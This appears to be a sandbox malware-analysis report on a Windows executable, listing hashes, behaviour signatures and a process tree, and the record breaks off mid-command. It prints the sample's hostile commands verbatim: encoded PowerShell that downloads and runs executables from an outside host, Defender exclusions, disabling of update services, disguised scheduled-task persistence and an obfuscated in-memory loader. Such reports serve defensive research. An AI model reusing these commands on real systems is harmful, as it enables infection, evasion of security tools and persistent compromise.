Analysis

  • max time kernel
    75s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-02-2023 13:17

General

  • Target

    aa95d6c08ae9201828da23593e42df4a2e39ce82.exe

  • Size

    626KB

  • MD5

    47b01695ff80b03ae518b333163da42c

  • SHA1

    aa95d6c08ae9201828da23593e42df4a2e39ce82

  • SHA256

    474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e

  • SHA512

    886a285e76a7d41e14bb1cfef3a464dc47e4b665bfd6905f26961253fd5f4eee0a6fed01afd464d603c8d17f6d09edc475e2fdd4da79178c6be0f54dc5bad466

  • SSDEEP

    6144:fMEN1L7wFSXZX4KipZx7fuwkBzvGwxAOo8jRfAAfc:f9N1LkFSJX45p3Uhq8jRAAE

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 3 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:644
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:588
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
            PID:992
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{4d9aacc5-e523-4b8b-88e8-37dc4e8f715c}
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4552
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:384
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:924
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
              1⤵
                PID:1260
                • C:\Windows\system32\sihost.exe
                  sihost.exe
                  2⤵
                    PID:2296
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                  1⤵
                    PID:1424
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                    1⤵
                      PID:1632
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                      1⤵
                        PID:1916
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                        1⤵
                          PID:2076
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                          1⤵
                            PID:2640
                          • C:\Windows\system32\DllHost.exe
                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                            1⤵
                              PID:3220
                            • C:\Windows\System32\RuntimeBroker.exe
                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                              1⤵
                                PID:3392
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                1⤵
                                  PID:1612
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                  1⤵
                                    PID:776
                                  • C:\Windows\system32\SppExtComObj.exe
                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                    1⤵
                                      PID:4880
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                      1⤵
                                        PID:1644
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                        1⤵
                                          PID:4708
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                          1⤵
                                            PID:4004
                                          • C:\Windows\system32\DllHost.exe
                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                            1⤵
                                              PID:4356
                                            • C:\Windows\System32\RuntimeBroker.exe
                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                              1⤵
                                                PID:3644
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                1⤵
                                                  PID:1672
                                                • C:\Windows\Explorer.EXE
                                                  C:\Windows\Explorer.EXE
                                                  1⤵
                                                    PID:3008
                                                    • C:\Users\Admin\AppData\Local\Temp\aa95d6c08ae9201828da23593e42df4a2e39ce82.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\aa95d6c08ae9201828da23593e42df4a2e39ce82.exe"
                                                      2⤵
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4772
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                        3⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4752
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB5AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBlAGsAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGwAbQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdAB2AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBiAGMAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGgAbwBwAHQAbwAuAG8AcgBnAC8AdwBvAHcALwAxAC8AMgAvADMALwA0AC8ANQAvADYALwA3AC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHMAbQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB5AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHIAegB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAdAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGwAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGQAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcAB4AHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAGQAawBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBkAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB5AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQQBwAHAALgBlAHgAZQAnACkAKQA8ACMAZgBmAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBuAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAdwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAHcAaABrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAagB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAHIAawBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAdQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAPAAjAG0AegBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAegB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcwBhAGcAIwA+AA=="
                                                          4⤵
                                                          • Blocklisted process makes network request
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2580
                                                          • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:4240
                                                          • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                                                            5⤵
                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                            • Drops file in Drivers directory
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Drops file in Program Files directory
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:720
                                                          • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:3420
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                              6⤵
                                                              • Creates scheduled task(s)
                                                              PID:1116
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 252
                                                        3⤵
                                                        • Program crash
                                                        PID:4636
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1696
                                                    • C:\Windows\System32\cmd.exe
                                                      C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                      2⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:488
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop UsoSvc
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:3084
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop WaaSMedicSvc
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:4796
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop wuauserv
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:2396
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop bits
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:5020
                                                      • C:\Windows\System32\sc.exe
                                                        sc stop dosvc
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:1136
                                                      • C:\Windows\System32\reg.exe
                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                        3⤵
                                                          PID:4464
                                                        • C:\Windows\System32\reg.exe
                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                          3⤵
                                                            PID:1112
                                                          • C:\Windows\System32\reg.exe
                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                            3⤵
                                                            • Modifies security service
                                                            PID:728
                                                          • C:\Windows\System32\reg.exe
                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                            3⤵
                                                              PID:2788
                                                            • C:\Windows\System32\reg.exe
                                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                              3⤵
                                                                PID:1792
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                                                              2⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2104
                                                            • C:\Windows\System32\dialer.exe
                                                              C:\Windows\System32\dialer.exe
                                                              2⤵
                                                                PID:3416
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                              1⤵
                                                                PID:4784
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                1⤵
                                                                  PID:884
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4772 -ip 4772
                                                                    2⤵
                                                                      PID:4728
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    1⤵
                                                                      PID:3720
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2668
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                          PID:2660
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2624
                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                            1⤵
                                                                              PID:2572
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                              1⤵
                                                                                PID:2564
                                                                              • C:\Windows\system32\taskhostw.exe
                                                                                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                                                1⤵
                                                                                  PID:2468
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                  1⤵
                                                                                    PID:2424
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                    1⤵
                                                                                      PID:2412
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                      1⤵
                                                                                        PID:2328
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                        1⤵
                                                                                          PID:2060
                                                                                        • C:\Windows\System32\spoolsv.exe
                                                                                          C:\Windows\System32\spoolsv.exe
                                                                                          1⤵
                                                                                            PID:1280
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                            1⤵
                                                                                              PID:2000
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                              1⤵
                                                                                                PID:1936
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                                1⤵
                                                                                                  PID:1908
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                  1⤵
                                                                                                    PID:1772
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                                    1⤵
                                                                                                      PID:1760
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                      1⤵
                                                                                                        PID:1676
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                        1⤵
                                                                                                          PID:1664
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                          1⤵
                                                                                                            PID:1560
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                            1⤵
                                                                                                              PID:1492
                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                              1⤵
                                                                                                                PID:1444
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                                1⤵
                                                                                                                  PID:1324
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                  1⤵
                                                                                                                    PID:1268
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                                    1⤵
                                                                                                                      PID:1192
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                                      1⤵
                                                                                                                        PID:1164
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                        1⤵
                                                                                                                          PID:1128
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:tPeoSICFkXDm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZctRzBOZnUJyZB,[Parameter(Position=1)][Type]$CAkwAlIolY)$iANeeHvXTVZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+'te'+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+''+'m'+'o'+'r'+''+'y'+''+[Char](77)+'odu'+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'el'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+',S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+'n'+''+[Char](115)+''+'i'+'Clas'+[Char](115)+','+[Char](65)+''+[Char](117)+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$iANeeHvXTVZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'ec'+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZctRzBOZnUJyZB).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$iANeeHvXTVZ.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+'e'+'',''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+'c,'+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'lo'+'t'+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+'a'+'l',$CAkwAlIolY,$ZctRzBOZnUJyZB).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+'e'+','+'M'+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+'d');Write-Output $iANeeHvXTVZ.CreateType();}$igrGdyvNhizGy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+'n'+[Char](51)+'2'+[Char](46)+'U'+'n'+'s'+[Char](97)+''+'f'+''+[Char](101)+''+'i'+''+'g'+''+[Char](114)+''+[Char](71)+''+'d'+''+'y'+''+[Char](118)+''+'N'+''+'h'+''+[Char](105)+''+[Char](122)+'Gy');$aKHAYfPDUVHikP=$igrGdyvNhizGy.GetMethod('a'+[Char](75)+''+[Char](72)+''+[Char](65)+''+[Char](89)+'f'+'P'+'D'+[Char](85)+'V'+[Char](72)+'ikP',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'bl'+'i'+''+'c'+''+[Char](44)+''+[Char](83)+'ta'+[Char](116)+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FmXBwwHHZCkphsEEcDZ=tPeoSICFkXDm @([String])([IntPtr]);$vFXWgjXzRzgaOfEVHjQnYC=tPeoSICFkXDm 